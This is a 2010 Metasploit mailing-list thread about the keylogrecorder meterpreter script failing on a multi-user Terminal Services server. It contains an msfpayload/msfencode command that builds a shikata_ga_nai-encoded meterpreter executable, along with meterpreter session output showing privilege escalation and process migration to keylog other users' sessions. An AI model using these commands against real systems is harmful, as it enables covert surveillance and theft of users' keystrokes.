
List:       metasploit-framework
Subject:    Re: [framework] keylogrecorder not working with Terminal Service
From:       Richard Miles <richard.k.miles () googlemail ! com>
Date:       2010-12-14 14:50:26
Message-ID: AANLkTimo0cr=3Vu=D3Q2B42iOybVpBDdGuwqAjBeuJM9 () mail ! gmail ! com

Hi

>> Nice. Can I have a beta of this smartlocker?
>
> not sure it will help you this time as the "fix" is to just pick the right one

I did this change on the code, and it works in normal cases, where you
have an explorer.exe for each user, but my case is a custom system
where no user has an explorer.exe associated; they just have the
application launched directly.

>> Or can you share insides of details of how you solved this problem?
>
> sure, pick the user you want to keylog, manually migrate into their
> process then run the keylogger

As I don't have an explorer.exe I had to migrate to the target
application or any other running one; the problem is that when I try to
migrate to the target application it keeps "Migrating" forever and
never comes back, like a frozen process. The only solution after
minutes is to kill the meterpreter session, and consequently the
application dies. Any idea?

Thanks

>
>
>> On Thu, Dec 2, 2010 at 5:47 PM, c0lists <lists@carnal0wnage.com> wrote:
>>> Actually mubix and I will be releasing smartlocker shortly that should
>>> handle some of the issues with multiple winlogon sessions.
>>>
>>> guess this is a good kick in the butt to do that...
>>>
>>> -CG
>>>
>>> On Thu, Dec 2, 2010 at 6:17 PM, Richard Miles
>>> <richard.k.miles@googlemail.com> wrote:
>>>> Hi
>>>>
>>>> I ended up unloading my antivirus and I was able to execute msfpayload
>>>> portable (last release available at the Metasploit website); most of the
>>>> features work very well, but when I try to create .exe payloads they're
>>>> created but not in the correct way. I created using:
>>>>
>>>> C:\Temp\ruby\bin>ruby.exe ..\..\msf3\msfpayload
>>>> windows/meterpreter/bind_tcp LHOST=127.0.0.1 R | ruby.exe
>>>> ..\..\msf3\msfencode -e x86/shikata_ga_nai -t exe > test.exe
>>>>
>>>> [*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)
>>>>
>>>> The test.exe was created, but when executed it starts and finishes
>>>> (crash?) in the same second. If I generate the same payload from my
>>>> Linux box it works very well. So, I believe it may be a bug.
>>>>
>>>> The other thing that caught my attention is keylogrecorder from
>>>> Carlos; it doesn't appear to work in a Terminal Service environment with
>>>> multiple users. See the output:
>>>>
>>>> meterpreter > run keylogrecorder -c 0
>>>> [*]     explorer.exe Process found, migrating into 3247
>>>> [*] Migration Successful!!
>>>> [*]     explorer.exe Process found, migrating into 3622
>>>> [-] Error in script: Rex::RuntimeError Cannot migrate into this
>>>> process (insufficient privileges)
>>>> meterpreter > getuid
>>>> Server username: MyDomain\User01
>>>> meterpreter > rev2self
>>>> meterpreter > getuid
>>>> Server username: MyDomain\User01
>>>> meterpreter > drop_token
>>>> Relinquished token, now running as: MyDomain\User01
>>>> meterpreter > getuid
>>>> Server username: MyDomain\User01
>>>> meterpreter >
>>>>
>>>> It clearly finds the first exploit and migrates to it, but it continues
>>>> the loop and tries to find the second user to migrate to, but it fails
>>>> because the previously migrated process is not administrator. I also
>>>> tried to revert my privilege to admin with rev2self or drop_token but
>>>> it doesn't work.
>>>>
>>>> My workaround was to modify the script to look for a specific pid and end
>>>> the loop when it is found. But it would be nice to have a patch to fix it
>>>> properly. Maybe ask for the name of the user to inject the keylogger
>>>> into, or maybe restore the older privileges before migrating to the next;
>>>> maybe this way we could keylog all the sessions at the same
>>>> time?
>>>>
>>>> Also, on this server I found a strange situation, where different
>>>> sessions do not have an explorer.exe; consequently the script failed. I
>>>> found just a few executables in use for these users. I used pslist
>>>> and I got the main process (using tree view - there are 2 main
>>>> processes), and I modified the keylogger to migrate to this process, but
>>>> the crazy thing is that it just freezes.
>>>>
>>>>
>>>> meterpreter > getsystem
>>>> ...got system (via technique 1).
>>>> meterpreter > run keylogrecorder -c 0 -t 15
>>>> [*]     spshell.exe Process found, migrating into 1980
>>>>
>>>> And it keeps on this screen forever.  Depending on the process, it just
>>>> gets stopped forever at this stage. On the other, it also gets stopped
>>>> forever at this stage but the main process dies. Has anyone seen
>>>> anything like that? Ideas why it happens? How to solve the situation?
>>>>
>>>> I'm unable to view or record the user activity in this case. Does anyone
>>>> have any suggestion?
>>>>
>>>> Thanks
>>>> _______________________________________________
>>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>>
>>>
>>
>
